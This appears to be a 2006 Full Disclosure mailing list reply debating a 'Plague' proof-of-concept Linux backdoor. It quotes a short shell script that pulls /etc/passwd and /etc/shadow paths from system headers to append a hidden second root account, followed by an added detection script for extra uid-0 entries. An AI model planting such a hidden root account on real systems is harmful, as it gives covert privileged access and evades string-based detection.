Full Disclosure mailing list archives

Re: Plague Proof of Concept Linux backdoor
From: hijacker () oldum net
Date: Mon, 23 Oct 2006 13:59:58 +0300 (EEST)

Hello Andrew,

I shall completely ignore the e-mails that followed your reply, as they
seem to me completely out of the subject and at the same time some of
them are offensive to me!

Let's go into more details on that backdoor.

I created the file test1.sh containing:

hijacker () hpa:~/hacki$ cat test1.sh
if [ -e /usr/include/paths.h ]
then
        # the target paths are read out of system headers rather than written literally
        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2
fi


Then I chmod 700 test1.sh and then I run:

hijacker () hpa:~/hacki$ ./test1.sh
sed: can't read /etc/shadow: Permission denied
./test1.sh: line 7: /etc/shadow: Permission denied
sed: can't read /etc/passwd,: No such file or directory
./test1.sh: line 9: /etc/passwd,: Permission denied

Are you saying I just injected my system with an account with root access
hiding somewhere? Please, clarify.

-Nikolay Kichukov

On 22 Oct 06, at 04:29, hijacker () oldum net wrote:
even if they have ssh access, there is still nothing they can do,
to create two files in their $HOME directories containing
expressions from paths.h and sysexits.h?

Why would that be considered a backdoor?

The awk commands parse out the strings "/etc/passwd" and "/etc/shadow" from
the headers. It's still rather easily detected - most of the rootkit
programs will detect an alternate uid0 account very quickly - but it
demonstrates an interesting way of avoiding target strings in the binary.

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
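The "alternate uid0 account" check Andrew refers to, as an added example that is not part of the thread: a small audit of a passwd-format file that reports any uid-0 login other than root, duplicate login names, and entries without the seven fields of a valid line. The sample file and the name plaguePoC follow the PoC above; everything else is constructed for the example.

```shell
#!/bin/sh
# Added detection example (not from the original thread). It audits a
# passwd-format file for what the PoC above would leave behind: an
# appended copy of the root line renamed to "plaguePoC", i.e. a second
# uid-0 account, plus any line that is not a well-formed 7-field entry.

# check_passwd FILE: print one finding per line, exit 1 if any were found.
check_passwd() {
    awk -F: '
        # A valid entry has exactly 7 colon-separated fields.
        NF != 7 { printf "malformed line %d: %s\n", NR, $0; bad++; next }
        # Any uid-0 login other than root is the classic alternate root account.
        $3 == 0 && $1 != "root" { printf "extra uid-0 account: %s (line %d)\n", $1, NR; bad++ }
        # A repeated login name also indicates an appended entry.
        seen[$1]++ == 1 { printf "duplicate user name: %s (line %d)\n", $1, NR; bad++ }
        END { exit (bad ? 1 : 0) }
    ' "$1"
}

# Constructed sample: a minimal passwd file with the line the PoC appends
# (root's entry run through s/root/plaguePoC/g).
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
nikolay:x:1000:1000:Nikolay:/home/nikolay:/bin/bash
plaguePoC:x:0:0:plaguePoC:/plaguePoC:/bin/bash
EOF

# On a real host you would run: check_passwd /etc/passwd
check_passwd "$SAMPLE" || echo "suspicious entries found in $SAMPLE"
```

The same walk over the file also catches the older trick of giving an existing user uid 0, since the check keys on the uid field, not on the name.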
